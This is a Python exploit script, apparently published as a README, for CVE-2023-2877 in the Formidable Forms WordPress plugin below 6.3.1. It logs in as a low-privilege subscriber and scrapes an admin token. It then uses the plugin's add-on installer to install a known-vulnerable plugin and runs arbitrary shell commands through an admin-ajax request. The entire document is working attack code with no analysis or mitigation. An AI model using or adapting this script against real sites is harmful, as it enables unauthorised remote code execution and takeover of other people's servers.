README.md
Rendering markdown...
#!/usr/bin/env python3
#
# Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution
# CVE-2023-2877
#
import argparse
import requests
import re
import os
requests.packages.urllib3.disable_warnings()
session = requests.Session()
# Setting User-Agent for all requests.
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
session.headers.update({'User-Agent': user_agent})
def login_wordpress(url, username, password):
# Set a real user agent header
# Perform login
login_data = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'redirect_to': '/wp-admin/',
}
try:
response = session.post(url + '/wp-login.php', data=login_data, verify=False)
response.raise_for_status()
# Check if logged in successfully
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print('Successfully logged in.')
else:
print('Failed to log in.')
except requests.exceptions.RequestException as e:
print('Error occurred while logging in:', str(e))
return session
def extract_token(session, url):
# Visit the specified page and extract the token
try:
response = session.get(url, verify=False)
response.raise_for_status()
token = re.search(r"token=(\w+)", response.text).group(1)
print(f'Token extracted: {token}')
return token
except requests.exceptions.RequestException as e:
print('If a 403 status code returned the Plugin is not installed / activted / vulnerable.')
print('Error occurred while extracting token:', str(e))
exit()
return None
def install_plugin(session, url, token,plugin):
# Install the plugin using the extracted token
plugin_url = f"{url}/wp-json/frm-admin/v1/install-addon?token={token}&file_url=https://downloads.wordpress.org/plugin/{plugin}"
try:
response = session.get(plugin_url, verify=False)
if response.status_code == 200:
if "Destination folder already exists" in response.text:
print("Plugin Already Installed.")
else:
print('Plugin installed successfully.')
print('Now run exploit script with --cmd / -c and command.')
else:
print('Failed to install the plugin.')
except requests.exceptions.RequestException as e:
print('Error occurred while installing plugin:', str(e))
def execute_ajax_request(url, cmd):
# Execute AJAX request with cmd value
ajax_url = f"{url}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:{cmd}:NULL:NULL"
try:
response = session.get(ajax_url, verify=False)
if response.status_code == 400:
print("Vulnerable Plugin for RCE is not installed.")
print("Run Script with out --cmd / -c to install vulnerable plugin for RCE.")
exit()
response.raise_for_status()
# Parse the JSON response
data = response.json()
if 'data' in data:
print("Data:")
print(data['data'])
else:
print("No data found.")
except requests.exceptions.RequestException as e:
print('Error occurred while executing AJAX request:', str(e))
def main():
parser = argparse.ArgumentParser(description='CVE-2023-2877 - Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution Script')
parser.add_argument('-w', '--url', required=True, help='WordPress site URL')
parser.add_argument('-u', '--username', required=True, help='WordPress username')
parser.add_argument('-p', '--password', required=True, help='WordPress password')
parser.add_argument('-pl', '--plugin', required=False, default="wp-upg.2.19.zip", help='Different Plugin to Install i.e mstore-api.3.9.0.zip')
parser.add_argument('-c', '--cmd', required=False, help='Command value')
args = parser.parse_args()
if args.cmd:
execute_ajax_request(args.url, args.cmd)
else:
session = login_wordpress(args.url, args.username, args.password)
admin_page_url = f"{args.url}/wp-admin/admin.php?page=formidable-welcome"
token = extract_token(session, admin_page_url)
install_plugin(session, args.url, token,args.plugin)
if __name__ == '__main__':
main()